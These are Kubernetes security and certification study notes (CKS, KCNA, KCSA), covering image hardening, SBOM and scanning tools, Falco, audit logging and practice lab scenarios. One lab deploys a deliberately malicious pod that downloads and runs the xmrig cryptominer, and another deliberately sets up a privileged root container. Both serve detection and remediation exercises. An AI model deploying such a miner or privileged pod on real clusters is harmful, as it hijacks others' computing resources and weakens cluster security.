    • Use multi-stage builds
    • Remove unnecessary files
    • Use a .dockerignore file to exclude files and directories from the image
    • Use COPY instead of ADD
    • Use alpine images
    • Use scratch images
    • Use distroless images
  • Example of a multi-stage build:

      # build container stage 1
      FROM ubuntu
      ARG DEBIAN_FRONTEND=noninteractive
      RUN apt-get update && apt-get install -y golang-go
      COPY app.go .
      RUN CGO_ENABLED=0 go build app.go

      # app container stage 2
      # it is better to use a defined tag, rather than 'latest'
      FROM alpine:3.12.1
      RUN addgroup -S appgroup && adduser -S appuser -G appgroup -h /home/appuser
      COPY --from=0 /app /home/appuser/app
      # run as a non-root user
      USER appuser
      CMD ["/home/appuser/app"]
    
  • Dockerfile best practices: https://docs.docker.com/build/building/best-practices/

  • Only certain docker directives create new layers in an image

    • FROM
    • COPY
    • CMD
    • RUN
  • dive and docker-slim are two tools you can use to explore the individual layers that make up an image

Static Analysis

SBOM

  • A SBOM is a list of all the software that makes up a container image (or an application, etc.)
  • Formats
    • SPDX
      • The standard format for sharing SBOM
      • Available in JSON, RDF, and tag/value formats
      • More complex than CycloneDX due to its extensive metadata coverage
      • Comprehensive metadata including license information, origin, and file details
    • CycloneDX
      • A lightweight format focused on security and compliance
      • Available in JSON and XML formats
      • Simpler and more focused on essential SBOM elements
      • Focuses on component details, vulnerabilities, and dependencies

Kubesec

  • Used for static analysis of manifests
  • https://github.com/controlplaneio/kubesec

Syft

  • Syft is a powerful and easy-to-use open-source tool for generating Software Bill of Materials (SBOMs) for container images and filesystems. It provides detailed visibility into the packages and dependencies in your software, helping you manage vulnerabilities, license compliance, and software supply chain security.
  • Syft can export results in SPDX, CycloneDX, JSON, etc.
  • To scan an image with syft and export the results to a file in SPDX format:
    syft scan docker.io/kodekloud/webapp-color:latest -o spdx --file /root/webapp-spdx.sbom
    

Grype

  • Grype is a tool (also from Anchore) that can be used to scan SBOM for vulnerabilities
  • To scan a SBOM with Grype:
    grype /root/webapp-sbom.json -o json --file /root/grype-report.json
    

Kube-linter

  • Kube-linter can be used to lint Kubernetes manifests and ensure best practices are being followed
  • kube-linter is configurable. You can disable/enable checks and even create your own custom checks
  • kube-linter includes recommendations for how to fix failed checks
  • https://github.com/stackrox/kube-linter

Scanning Images for Vulnerabilities

trivy

  • trivy can be used to scan images, git repos, and filesystems for vulnerabilities
  • https://github.com/aquasecurity/trivy
  • Example:
      sudo docker run --rm  aquasec/trivy:0.17.2 nginx:1.16-alpine
    

6 Monitoring, Logging, and Runtime Security

falco

  • Falco is an IDS for Kubernetes workloads
  • falco is a cloud native security tool. It provides near real-time threat detection for cloud, container, and Kubernetes workloads by leveraging runtime insights. Falco can monitor events defined via customizable rules from various sources, including the Linux kernel, and enrich them with metadata from the Kubernetes API server, container runtime, and more. Falco supports a wide range of kernel versions, x86_64 and ARM64 architectures, and many different output channels.
  • falco uses Sysdig filter syntax to extract information about an event. Filters are configured in the falco rules file or ConfigMap. They can also be passed via Helm values.
    • /etc/falco/falco.yaml - the main configuration file for falco
    • /etc/falco/falco_rules.yaml - the main rules file for falco
  • falco rule files consist of 3 elements defined in YAML:
    • rules - a rule is a condition under which an alert should be generated
    • macros - a macro is a reusable rule condition. These help keep the rules file clean and easy to read
    • lists - a collection of items that can be used in rules and macros
  • Some examples of events that falco watches for:
    • Reading or writing files at a specific location in the filesystem
    • Opening a shell binary for a container, such as /bin/bash
    • Sending or receiving traffic to/from undesired URLs
  • Falco deploys a set of sensors that listen for configured events and conditions
    • Each sensor contains a set of rules that map an event to a data source.
    • An alert is produced when a rule matches a specific event
    • Alerts are then sent to an output channel to record the event

Ensuring Container Immutability

  • Containers should be immutable. This means that once a container is created, it should not be changed. If changes are needed, a new container should be created.
  • Containers are mutable (changeable) by default. This can lead to security vulnerabilities.
  • To ensure container immutability:
    • Use a ‘distroless’ container image. These images are minimal and contain only the necessary components to run an application. They do not include a shell.
    • Use a ‘read-only’ file system. This prevents changes to the file system. To configure a read-only file system, add the following to the pod spec:
      spec:
        containers:
        - name: my-container
          image: my-image
          securityContext:
            readOnlyRootFilesystem: true
      

Audit Logs

  • Auditing involves recording and tracking all events and actions within the cluster
  • Who made a change, when was it changed, and what exactly was changed
  • Audit logs provide a chronological record of activities within a cluster
  • Entries in the audit log exist in ‘JSON Lines’ format. Note that this is not the same as JSON. Each line in the log is a separate JSON object.
  • Audit levels (set per rule in the policy):
    • None - no logging
    • Metadata - logs request metadata, but not the request or response body
    • Request - logs request metadata and request body, but not the response body
    • RequestResponse - logs the metadata, request body, and response body

Sample Audit Policy

```
apiVersion: audit.k8s.io/v1 # This is required.
kind: Policy
omitStages:
  - "RequestReceived"
rules:
  # Log pod changes at RequestResponse level
  - level: RequestResponse
    resources:
    - group: ""
      # Resource "pods" doesn't match requests to any subresource of pods,
      # which is consistent with the RBAC policy.
      resources: ["pods"]
  # Log "pods/log", "pods/status" at Metadata level
  - level: Metadata
    resources:
    - group: ""
      resources: ["pods/log", "pods/status"]

  # Don't log requests to a configmap called "controller-leader"
  - level: None
    resources:
    - group: ""
      resources: ["configmaps"]
      resourceNames: ["controller-leader"]

  # Don't log watch requests by the "system:kube-proxy" on endpoints or services
  - level: None
    users: ["system:kube-proxy"]
    verbs: ["watch"]
    resources:
    - group: "" # core API group
      resources: ["endpoints", "services"]

  # Don't log authenticated requests to certain non-resource URL paths.
  - level: None
    userGroups: ["system:authenticated"]
    nonResourceURLs:
    - "/api*" # Wildcard matching.
    - "/version"

  # Log the request body of configmap changes in kube-system.
  - level: Request
    resources:
    - group: "" # core API group
      resources: ["configmaps"]
    # This rule only applies to resources in the "kube-system" namespace.
    # The empty string "" can be used to select non-namespaced resources.
    namespaces: ["kube-system"]

  # Log configmap and secret changes in all other namespaces at the Metadata level.
  - level: Metadata
    resources:
    - group: "" # core API group
      resources: ["secrets", "configmaps"]

  # Log all other resources in core and extensions at the Request level.
  - level: Request
    resources:
    - group: "" # core API group
    - group: "extensions" # Version of group should NOT be included.

  # A catch-all rule to log all other requests at the Metadata level.
  - level: Metadata
    # Long-running requests like watches that fall under this rule will not
    # generate an audit event in RequestReceived.
    omitStages:
      - "RequestReceived"
```
  • Once the audit policy has been defined, you can apply it to the cluster by passing the --audit-policy-file flag to the kube-apiserver
  • To use a file-based log backend, you need to pass the following to the kube-apiserver:
    • --audit-policy-file - the path to the audit policy file
    • --audit-log-path - the path to the audit log file
    • both of these paths need to be mounted into the kube-apiserver pod. The kube-apiserver cannot read or write these files on the node without a proper volume/volumeMount (see the excerpt below)
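  • A sketch of the relevant kube-apiserver static pod changes (paths below are examples):

      # excerpt from /etc/kubernetes/manifests/kube-apiserver.yaml
      spec:
        containers:
        - command:
          - kube-apiserver
          - --audit-policy-file=/etc/kubernetes/audit/policy.yaml
          - --audit-log-path=/var/log/kubernetes/audit/audit.log
          - --audit-log-maxage=30      # optional: days to retain old audit logs
          - --audit-log-maxbackup=10   # optional: number of old audit log files to keep
          volumeMounts:
          - name: audit-policy
            mountPath: /etc/kubernetes/audit
            readOnly: true
          - name: audit-log
            mountPath: /var/log/kubernetes/audit
        volumes:
        - name: audit-policy
          hostPath:
            path: /etc/kubernetes/audit
            type: DirectoryOrCreate
        - name: audit-log
          hostPath:
            path: /var/log/kubernetes/audit
            type: DirectoryOrCreate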

Certified Kubernetes Security Specialist (CKS) Practice Scenarios

Scenario 1: Prevent Privilege Escalation

Objective: Ensure a pod cannot escalate privileges or run as root.

Problem Statement:

You have been given a pod specification that allows a container to run as root. Your task is to:

  1. Modify the pod spec to ensure it runs as a non-root user.
  2. Apply a PodSecurityPolicy (if using older versions) or Pod Security Admission (PSA) to enforce this restriction.

Pod spec to modify:

cat << EOF | kubectl create -f -
apiVersion: v1
kind: Pod
metadata:
  name: insecure-pod
  labels:
    app: insecure
spec:
  containers:
  - name: insecure-container
    image: busybox
    command: ["sleep", "3600"]
    securityContext:
      privileged: true  # Allows full access to the host (needs to be removed)
      runAsUser: 0      # Runs as root (needs to be changed)
      capabilities:
        add: ["NET_ADMIN", "SYS_ADMIN"]  # Grants unnecessary capabilities
EOF
💡 Hints
  • Use securityContext.runAsNonRoot: true
  • Use securityContext.capabilities.drop: ["ALL"]
  • If using PSA, enforce the restricted profile.

Expected Outcome:

  • The pod should not run as root.
  • Any attempt to run a root-level container should be denied.
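
A possible remediation, as a sketch (pod and container names mirror the insecure spec above; the UID is an arbitrary non-zero example):

cat << EOF | kubectl create -f -
apiVersion: v1
kind: Pod
metadata:
  name: secure-pod
  labels:
    app: secure
spec:
  containers:
  - name: secure-container
    image: busybox
    command: ["sleep", "3600"]
    securityContext:
      runAsNonRoot: true
      runAsUser: 1000
      allowPrivilegeEscalation: false
      seccompProfile:
        type: RuntimeDefault
      capabilities:
        drop: ["ALL"]
EOF

To enforce the restriction with Pod Security Admission, label the namespace (the namespace name is an example):

kubectl label ns default pod-security.kubernetes.io/enforce=restricted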

Scenario 2: Detect and Mitigate a Cryptojacking Attack

Objective: Identify and remove a malicious pod mining cryptocurrency.

Problem Statement:

A newly deployed pod has been consuming a high amount of CPU resources without any declared resource limits. Upon investigation, it appears to be running a cryptomining process (xmrig). Your tasks:

  1. Identify the pod consuming excessive CPU.
  2. Inspect the container and confirm it is mining cryptocurrency.
  3. Mitigate the issue by removing the pod and applying security policies to prevent future attacks.

Deploy a malicious pod:

cat << EOF | kubectl create -f -
apiVersion: v1
kind: Pod
metadata:
  name: cryptominer
  labels:
    app: cryptominer
spec:
  containers:
  - name: cryptominer-container
    image: ubuntu
    command: ["/bin/sh", "-c", "apt update && apt install -y curl && curl -sL https://github.com/xmrig/xmrig/releases/latest/download/xmrig -o /usr/local/bin/xmrig && chmod +x /usr/local/bin/xmrig && /usr/local/bin/xmrig"]
    resources:
      requests:
        cpu: "500m"
      limits:
        cpu: "2000m"
EOF
💡 Hints
  • Use kubectl top pod --sort-by=cpu to find high CPU-consuming pods.
  • Use kubectl exec -it <pod> -- ps aux to check running processes.
  • Consider Network Policies to restrict outbound traffic.
  • Apply ResourceQuotas and LimitRanges to prevent overuse.

Expected Outcome:

  • The malicious pod should be deleted.
  • Future unauthorized mining activities should be restricted using security policies.

Scenario 3: Restrict Container Networking

Objective: Implement a network policy to isolate an application from unauthorized access.

Problem Statement:

Your application pod (web-app) should only communicate with the database (db) pod. Other pods should not be able to access web-app. Implement a NetworkPolicy to enforce this restriction.

cat << EOF | kubectl create -f -
apiVersion: v1
kind: Pod
metadata:
  name: web-app
  labels:
    app: web-app
spec:
  containers:
  - name: web-container
    image: nginx
    ports:
    - containerPort: 80
---
apiVersion: v1
kind: Pod
metadata:
  name: db
  labels:
    app: db
spec:
  containers:
  - name: db-container
    image: mysql
    ports:
    - containerPort: 3306
--- 
apiVersion: v1
kind: Pod
metadata:
  name: attacker
  labels:
    app: attacker
spec:
  containers:
  - name: attacker-container
    image: busybox
    command: ["sleep", "3600"]
EOF
💡 Hints
  • Create a NetworkPolicy that allows traffic from db to web-app.
  • Deny all ingress traffic by default.
  • Use kubectl run busybox --rm -it --image=busybox -- sh to test connectivity.

Expected Outcome:

  • Only db can communicate with web-app.
  • Any external pod trying to access web-app should be denied.
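
A possible solution, as a sketch (assumes a CNI plugin that enforces NetworkPolicy; selectors reuse the labels from the manifests above):

cat << EOF | kubectl create -f -
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-ingress
spec:
  podSelector: {}
  policyTypes:
  - Ingress
---
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-db-to-web-app
spec:
  podSelector:
    matchLabels:
      app: web-app
  policyTypes:
  - Ingress
  ingress:
  - from:
    - podSelector:
        matchLabels:
          app: db
    ports:
    - protocol: TCP
      port: 80
EOF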

Scenario 4: Protect Secrets in Kubernetes

Objective: Ensure Kubernetes secrets are stored and accessed securely.

Problem Statement:

An application pod is reading a Kubernetes secret (db-password). Your security audit revealed:

  1. The secret is mounted as a plain text environment variable.
  2. Developers are retrieving secrets using kubectl get secrets.

Your tasks:

  • Modify the pod spec to mount the secret as a file instead of an environment variable.
  • Restrict access to secrets by applying RBAC policies.
cat << EOF | kubectl create -f -
apiVersion: v1
kind: Secret
metadata:
  name: db-secret
type: Opaque
data:
  username: dXNlcg==  # Base64 encoded "user"
  password: c2VjdXJlcGFzcw==  # Base64 encoded "securepass"
---
apiVersion: v1
kind: Pod
metadata:
  name: insecure-pod
spec:
  containers:
  - name: app-container
    image: busybox
    command: [ "sh", "-c", "env | grep DB_" ]
    env:
    - name: DB_USERNAME
      valueFrom:
        secretKeyRef:
          name: db-secret
          key: username
    - name: DB_PASSWORD
      valueFrom:
        secretKeyRef:
          name: db-secret
          key: password
EOF
💡 Hints
  • Use volumeMounts and volumes instead of env.
  • Implement RBAC to restrict access to kubectl get secrets.

Expected Outcome:

  • The application still retrieves the secret, but in a more secure manner.
  • Unauthorized users cannot list secrets.
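
A possible remediation, as a sketch (the mount path and Role name are examples; the Role deliberately omits access to secrets):

cat << EOF | kubectl create -f -
apiVersion: v1
kind: Pod
metadata:
  name: secure-pod
spec:
  containers:
  - name: app-container
    image: busybox
    command: ["sh", "-c", "ls /etc/db-creds && sleep 3600"]
    volumeMounts:
    - name: db-creds
      mountPath: /etc/db-creds
      readOnly: true
  volumes:
  - name: db-creds
    secret:
      secretName: db-secret
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: developer
  namespace: default
rules:
- apiGroups: [""]
  resources: ["pods", "configmaps"]
  verbs: ["get", "list", "watch"]
EOF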

Scenario 5: Detect and Block Unauthorized Container Images

Objective: Restrict pod deployments to approved images only.

Problem Statement:

A developer accidentally deployed an image from Docker Hub (nginx:latest) instead of using the company’s private registry (registry.example.com/nginx:latest). You need to:

  1. Detect and delete unauthorized images.
  2. Implement Gatekeeper to enforce image restrictions.

Steps:

  1. Deploy Gatekeeper
kubectl apply -f https://raw.githubusercontent.com/open-policy-agent/gatekeeper/v3.18.2/deploy/gatekeeper.yaml
  2. Deploy a constraint template and constraint to restrict images (a sketch follows the pod manifest below):

  3. Deploy non-compliant pod(s) and see the result:

cat << EOF | kubectl create -f -
apiVersion: v1
kind: Pod
metadata:
  name: unauthorized-pod
  labels:
    app: unauthorized
spec:
  containers:
  - name: nginx-container
    image: nginx:latest
    ports:
    - containerPort: 80
EOF
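
For step 2, a possible constraint template and constraint, as a sketch based on the k8sallowedrepos example from the Gatekeeper policy library (the allowed repo prefix comes from the scenario). Apply the template first and wait for the K8sAllowedRepos CRD to register before creating the constraint:

cat << EOF | kubectl create -f -
apiVersion: templates.gatekeeper.sh/v1
kind: ConstraintTemplate
metadata:
  name: k8sallowedrepos
spec:
  crd:
    spec:
      names:
        kind: K8sAllowedRepos
      validation:
        openAPIV3Schema:
          type: object
          properties:
            repos:
              type: array
              items:
                type: string
  targets:
    - target: admission.k8s.gatekeeper.sh
      rego: |
        package k8sallowedrepos
        violation[{"msg": msg}] {
          container := input.review.object.spec.containers[_]
          satisfied := [good | repo = input.parameters.repos[_]; good = startswith(container.image, repo)]
          not any(satisfied)
          msg := sprintf("container <%v> uses a disallowed image repo <%v>, allowed repos are %v", [container.name, container.image, input.parameters.repos])
        }
EOF

cat << EOF | kubectl create -f -
apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sAllowedRepos
metadata:
  name: repo-must-be-company-registry
spec:
  match:
    kinds:
      - apiGroups: [""]
        kinds: ["Pod"]
  parameters:
    repos:
      - "registry.example.com/"
EOF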
💡 Hints
  • Use kubectl get pods -o jsonpath='{.items[*].spec.containers[*].image}' to find all running images.
  • Install Gatekeeper with Open Policy Agent (OPA) to enforce policies.

Expected Outcome:

  • Unauthorized images should be flagged and removed.
  • Only images from registry.example.com should be allowed.

KCNA

Directory Map

Kubernetes and Cloud Native Associate (KCNA) Notes


https://www.cncf.io/certification/kcna/

Kubernetes and Cloud Native Associate (KCNA) Notes

Table of Contents

Exam

Outline

https://github.com/cncf/curriculum/blob/master/KCNA_Curriculum.pdf

Changes

Preparation

Study Resources

https://learn.kodekloud.com/user/courses/kubernetes-and-cloud-native-associate-kcna https://amazon.com/KCNA-Book-Kubernetes-Native-Associate/dp/1916585035

Practice

https://learn.kodekloud.com/user/courses/kubernetes-and-cloud-native-associate-kcna https://tutorialsdojo.com/kubernetes-and-cloud-native-associate-kcna-sample-exam-questions/

Kubernetes Fundamentals

Pods

  • A pod is the smallest deployable unit in Kubernetes. A Pod represents a single instance of a running process in your cluster.
  • Pods deploy a container image on a Kubernetes cluster as a running instance of an application.
  • A pod can contain more than one container.
    • An example use case would be a pod that contains a web server and a sidecar container that collects logs for the web server container.
  • A pod can be deployed by using kubectl or by creating a YAML manifest:
    • Kubectl example:
    kubectl run my-pod --image=my-image
    
    • YAML manifest example:
    apiVersion: v1
    kind: Pod
    metadata:
      name: my-pod
    spec:
      containers:
      - name: my-container
        image: my-image
    
  • You can view pods running in a cluster by using the following command:
    kubectl get pods
    
    • You can view detailed information about a pod by using the following command:
    kubectl describe pod my-pod
    

ReplicaSets

  • A ReplicaSet ensures that a specified number of pod replicas are running at any given time.
  • A ReplicaSet is defined by a YAML manifest that specifies the number of replicas to maintain.
  • A ReplicaSet can be deployed by creating a YAML manifest:
    • Kubectl example:
    kubectl create -f my-replicaset.yaml
    
  • ReplicationControllers are the older predecessor of ReplicaSets and have largely been replaced by them.
  • You can view ReplicaSets running in a cluster by using the following command:
    kubectl get replicaset
    
    • You can view detailed information about a ReplicaSet by using the following command:
    kubectl describe replicaset my-replicaset
    

Deployments:

  • A Deployment is a higher-level concept that manages ReplicaSets and provides declarative updates to Pods along with a lot of other useful features.
  • A Deployment is defined by a YAML manifest that specifies the desired state of the deployment.
  • A Deployment can be deployed by creating a YAML manifest or imperatively using kubectl:
    • YAML example:
    kubectl create -f my-deployment.yaml
    
  • You can view Deployments running in a cluster by using the following command:
    kubectl get deployments
    
  • You can view detailed information about a Deployment by using the following command:
    kubectl describe deployment my-deployment
    
  • Rolling updates can be performed on a Deployment by updating the Deployment’s YAML manifest and applying the changes:
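    • For example (using the hypothetical names from the manifests above):

    kubectl set image deployment/my-deployment my-container=my-image:v2
    kubectl rollout status deployment/my-deployment
    kubectl rollout undo deployment/my-deployment   # roll back if needed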

ReplicaSet vs Deployment:

  • ReplicaSets are a lower-level concept that manages Pods and ensures a specified number of pod replicas are running at any given time.
  • Deployments are a higher-level concept that manage ReplicaSets and provide declarative updates to Pods along with a lot of other useful features.

Kubernetes Namespaces

  • Namespaces are a way to divide cluster resources between multiple users.
  • Namespaces can be used to organize resources and provide a way to scope resources.
  • Namespaces can be used to create resource quotas and limit the amount of resources a user can consume.
  • Namespaces can be used to create network policies and limit the network traffic between pods.
  • Namespaces can be used to create role-based access control (RBAC) policies and limit the permissions of users.

Imperative vs Declarative

  • Imperative:
    • Imperative commands are used to perform a specific task.
    • An example of an imperative command would be to create a pod using kubectl run.
    • Imperative commands are useful for quick tasks and testing.
  • Declarative:
    • Declarative commands are used to define the desired state of a resource.
    • An example of a declarative command would be to create a pod using a YAML manifest.
    • Declarative commands are useful for managing resources in a production environment.

Scheduling

  • Scheduling is the process of assigning pods to nodes in a Kubernetes cluster.
  • The Kubernetes scheduler is responsible for scheduling pods to nodes based on resource requirements and constraints.
  • The scheduler uses a set of policies to determine where to place pods in the cluster.
  • The scheduler can be configured to use different scheduling algorithms and policies.
  • The scheduler can be extended with custom scheduling plugins.
  • To schedule a pod, the scheduler evaluates the pod’s resource requirements, affinity and anti-affinity rules, taints and tolerations, and other constraints. It then selects a node that meets the requirements and assigns the pod to that node by updating the spec.nodeName field in the pod’s manifest.

Labels and Selectors

  • Labels are key-value pairs that are attached to objects in Kubernetes.
  • Labels can be used to organize and select objects in Kubernetes.
  • Labels can be used to filter and group objects in Kubernetes.
  • Labels can be used to create selectors that match objects based on their labels.
  • Selectors are used to select objects in Kubernetes based on their labels.
  • Selectors can be used to filter objects based on their labels.
  • Selectors can be used to group objects based on their labels.
  • Selectors can be used to create sets of objects that match a specific label query.
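  • Example commands (label keys/values are hypothetical):

kubectl label pod my-pod app=my-app        # add a label to a pod
kubectl get pods -l app=my-app             # equality-based selector
kubectl get pods -l 'env in (dev,test)'    # set-based selector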

Taints and Tolerations

  • Taints are used to repel pods from nodes in a Kubernetes cluster.
  • We apply a taint to a node (as a key-value pair). Any pods that do not have a toleration for that taint will not be scheduled on that node.
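  • Example (the node name and taint key/value are hypothetical):

# taint a node
kubectl taint nodes node1 dedicated=gpu:NoSchedule

# a pod that tolerates the taint
apiVersion: v1
kind: Pod
metadata:
  name: my-pod
spec:
  containers:
  - name: my-container
    image: my-image
  tolerations:
  - key: "dedicated"
    operator: "Equal"
    value: "gpu"
    effect: "NoSchedule"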

Node Selectors

  • Node selectors are used to constrain which nodes a pod is eligible to be scheduled based on labels on the node.
  • Node selectors are used to filter nodes based on their labels.
  • To use a node selector, you add a nodeSelector field to the pod’s spec that specifies a set of key-value pairs that must match the labels on the node.
  • Example:
apiVersion: v1
kind: Pod
metadata:
  name: my-pod
spec:
  containers:
  - name: my-container
    image: my-image
  nodeSelector:
    disktype: ssd

Node Affinity

  • Node affinity is a way to constrain which nodes a pod is eligible to be scheduled based on labels on the node.
  • Node affinity is similar to node selectors but provides more control over how pods are scheduled.
  • Node affinity can be used to specify required and preferred rules for node selection.
  • Node affinity can be used to specify rules that match or do not match nodes based on their labels.
  • Node affinity can be used to specify rules that match or do not match nodes based on their topology.
  • Example:
apiVersion: v1
kind: Pod
metadata:
  name: my-pod
spec:
  containers:
  - name: my-container
    image: my-image
  affinity:
    nodeAffinity:
      requiredDuringSchedulingIgnoredDuringExecution:
        nodeSelectorTerms:
        - matchExpressions:
          - key: disktype
            operator: In
            values:
            - ssd

Requests and Limits

  • Requests and limits are used to specify the amount of resources a pod requires and the maximum amount of resources a pod can consume.
  • Requests are used to specify the amount of resources a pod requires to run.
  • Limits are used to specify the maximum amount of resources a pod can consume.
  • Requests and limits can be specified for CPU and memory resources.
  • Requests and limits can be specified in the pod’s spec.
  • Example:
apiVersion: v1
kind: Pod
metadata:
  name: my-pod
spec:
  containers:
  - name: my-container
    image: my-image
    resources:
      requests:
        memory: "64Mi"
        cpu: "250m"
      limits:
        memory: "128Mi"
        cpu: "500m"

DaemonSets

  • DaemonSets are used to run a copy of a pod on all nodes in a Kubernetes cluster.
  • DaemonSets are used to run system daemons and other background tasks on all nodes.
  • DaemonSets are defined by a YAML manifest that specifies the pod template to use.
  • DaemonSets can be deployed by creating a YAML manifest:
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: my-daemonset
spec:
  selector:
    matchLabels:
      app: my-daemonset
  template:
    metadata:
      labels:
        app: my-daemonset
    spec:
      containers:
      - name: my-container
        image: my-image

Static Pods

  • Static Pods are pods that are managed by the kubelet on a node.
  • Static Pods are defined by a file on the node’s filesystem.
  • Static Pods are not managed by the Kubernetes API server.
  • Static Pods are useful for running system daemons and other background tasks on a node.
  • Static Pods are defined by a file in the /etc/kubernetes/manifests directory on the node.
  • Static Pods are created and managed by the kubelet on the node.

Multiple Schedulers

  • Kubernetes supports multiple schedulers that can be used to schedule pods in a cluster.
  • You can even create your own scheduler and use it to schedule pods in a cluster.

Authentication

  • Authentication is the process of verifying the identity of a user or system.
  • Kubernetes supports multiple authentication methods, including:
    • X.509 client certificates
    • Static tokens
    • Service accounts
    • OpenID Connect tokens
    • Webhook tokens

authorization

  • Authorization is the process of determining what actions a user or system is allowed to perform.
  • Kubernetes supports multiple authorization methods, including:
    • Role-based access control (RBAC)
    • Attribute-based access control (ABAC)

API Groups

  • API groups are used to organize resources in Kubernetes.
  • API groups are used to group related resources together.
  • API groups that you will commonly use:
    • core: Contains core resources like pods, services, and namespaces.
    • apps: Contains higher-level resources like deployments, replica sets, and stateful sets.
    • batch: Contains resources like jobs and cron jobs.
    • extensions: A deprecated API group; its resources (e.g., Deployments, DaemonSets, Ingress) have moved to groups like apps and networking.k8s.io.
    • networking.k8s.io: Contains resources like network policies and ingresses.
    • storage.k8s.io: Contains resources like storage classes and persistent volume claims.
    • rbac.authorization.k8s.io: Contains resources like roles and role bindings.
    • metrics.k8s.io: Contains resources like pod metrics.
    • autoscaling: Contains resources like horizontal pod autoscalers.
    • admissionregistration.k8s.io: Contains resources like mutating webhooks and validating webhooks.
  • Example:
curl -k https://<master-ip>:6443/apis/apps/v1

Role Based Access Control (RBAC)

  • Role-based access control (RBAC) is a method of restricting access to resources based on the roles of users or systems.
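  • A minimal Role and RoleBinding example (names and the subject are hypothetical):

apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: pod-reader
  namespace: default
rules:
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: read-pods
  namespace: default
subjects:
- kind: User
  name: jane
  apiGroup: rbac.authorization.k8s.io
roleRef:
  kind: Role
  name: pod-reader
  apiGroup: rbac.authorization.k8s.io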

Service Accounts

  • Service Accounts are created and managed by the Kubernetes API and can be used for machine authentication
  • To create a service account: kubectl create serviceaccount <account name>
  • Service accounts are namespaced
  • When a service account is created, it has a token created automatically. The token is stored as a secret object.
  • You can also use the (decoded) token to communicate with the Kube API Server: curl https://172.16.0.1:6443/api --insecure --header "Authorization: Bearer <token value>"
  • You can grant service accounts permission to the cluster itself by binding them to a role with a RoleBinding. If a pod needs access to the cluster where it is hosted, you configure the automountServiceAccountToken boolean parameter on the pod and assign it a service account that has the appropriate permissions to the cluster. The token will be mounted to the pod's file system, where the value can then be accessed by the pod. The secret is mounted at /var/run/secrets/kubernetes.io/serviceaccount/token.
  • A service account named ‘default’ is automatically created in every namespace
  • As of kubernetes 1.22, tokens are automatically mounted to pods by an admission controller as a projected volume.
    • https://github.com/kubernetes/enhancements/blob/master/keps/sig-auth/1205-bound-service-account-tokens/README.md
  • As of Kubernetes 1.24, when you create a service account, a secret is no longer created automatically for the token. Now you must run kubectl create token <service account name> to create the token.
    • https://github.com/kubernetes/enhancements/issues/2799

Container Orchestration

Cluster Networking

  • A kubernetes cluster consists of master and worker nodes. Each node must have a network interface with a valid IP address configured. Each host must be connected to a network.
  • Certain TCP/UDP ports are required to be open:
    • 6443/tcp - kube-apiserver
    • 10250/tcp - kubelet API
    • 10251/tcp - kube-scheduler
    • 10252/tcp - kube-controller-manager
    • 2379/tcp - etcd client API
    • 2380/tcp - etcd peer API
    • 30000-32767/tcp - NodePort services

Pod Networking

  • Every pod requires an IP address
  • Every pod in the cluster should be able to reach every other pod without using NAT

CNI

  • Container Network Interface
  • Container Network Interface (CNI) is a framework for dynamically configuring networking resources. It uses a group of libraries and specifications written in Go. The plugin specification defines an interface for configuring the network, provisioning IP addresses, and maintaining connectivity with multiple hosts.

DNS

  • Domain Name Service
  • Used to resolve names to IP addresses
  • CoreDNS is the default DNS service used in Kubernetes

Ingress

Services

  • Services are like a load balancer. They load balance traffic to backend pods (referred to as endpoints)
  • There are 3 types of services in Kubernetes
    • ClusterIP
      • the default
      • The service IP address is only available inside the cluster
    • NodePort
      • Makes the service accessible on a predefined port on all nodes in the cluster
    • LoadBalancer
      • Provisions a load balancer in a cloud environment to make the service accessible
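  • A minimal Service example (names, labels, and ports are hypothetical):

apiVersion: v1
kind: Service
metadata:
  name: my-service
spec:
  type: ClusterIP        # or NodePort / LoadBalancer
  selector:
    app: my-app
  ports:
  - port: 80             # port the Service listens on
    targetPort: 8080     # port the backend pods listen on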

Sidecars

  • Sidecars are a secondary container running inside our pod that provide a service for the primary pod
  • An example is a container in our pod that ships logs to an external service for the business-logic container

Envoy

Storage

Cloud Native Architecture

Autoscaling

  • Horizontal Pod Autoscaler (HPA)
    • Automatically scales the number of pods in a deployment based on CPU utilization or custom metrics
  • Vertical Pod Autoscaler (VPA)
    • Automatically adjusts the CPU and memory requests and limits for a pod based on its usage
  • Cluster Autoscaler
    • Automatically adjusts the number of nodes in a cluster based on resource demands
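  • Example of creating an HPA imperatively (the deployment name and thresholds are hypothetical):

kubectl autoscale deployment my-deployment --cpu-percent=50 --min=2 --max=10
kubectl get hpa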

Kubernetes KEPs and SIGs

  • Kubernetes Enhancement Proposals (KEPs) are used to propose and track major changes to Kubernetes
  • Special Interest Groups (SIGs) are used to organize contributors around specific areas of the project

Cloud Native Application Delivery

GitOps

  • What is GitOps
    • GitOps uses a Git repository as the single source of truth for declarative infrastructure and application definitions

  • GitOps Principles
    • Declarative - The entire system must be described declaratively
    • Versioned/Immutable - The desired state is stored in a way that enforces immutability and versioning, retaining a complete version history
    • Pulled Automatically - Software agents automatically pull the desired state declarations from the source
    • Continuously Reconciled - Monitor desired state vs. actual state and reconcile if needed

Observability

Prometheus

  • Prometheus is an open-source monitoring and alerting system
  • Prometheus scrapes metrics from instrumented jobs and stores them in a time-series database
  • Prometheus provides a query language (PromQL) to query and visualize the collected metrics
  • Prometheus can be integrated with Grafana for visualization
  • Prometheus can be used to monitor Kubernetes clusters and applications running on Kubernetes
  • Prometheus is designed to collect numeric time-series data, not logs.
  • Exporters run on the nodes and expose metrics to Prometheus
  • Prometheus scrapes the metrics from the exporters

KCSA

Directory Map

Kubernetes and Cloud Native Security Associate (KCSA) Notes


https://www.cncf.io/certification/kcsa/

Kubernetes and Cloud Native Security Associate (KCSA) Notes

Table of Contents

Exam

Outline

  • Exam Duration: 2 hours
  • Number of Questions: 50
  • Question Format: Multiple choice
  • Passing Score: 66%
  • Exam Cost: $300

Changes


Preparation

Study Resources

Practice

Introduction

The Kubernetes and Cloud Native Security Associate (KCSA) certification prepares individuals to secure Kubernetes environments and address modern cloud-native security challenges. This document consolidates core concepts, threat models, compliance standards, and best practices.


Overview of Cloud Native Security

4Cs of Cloud Native Security

  1. Code: Secure development practices (e.g., avoid hardcoding secrets).
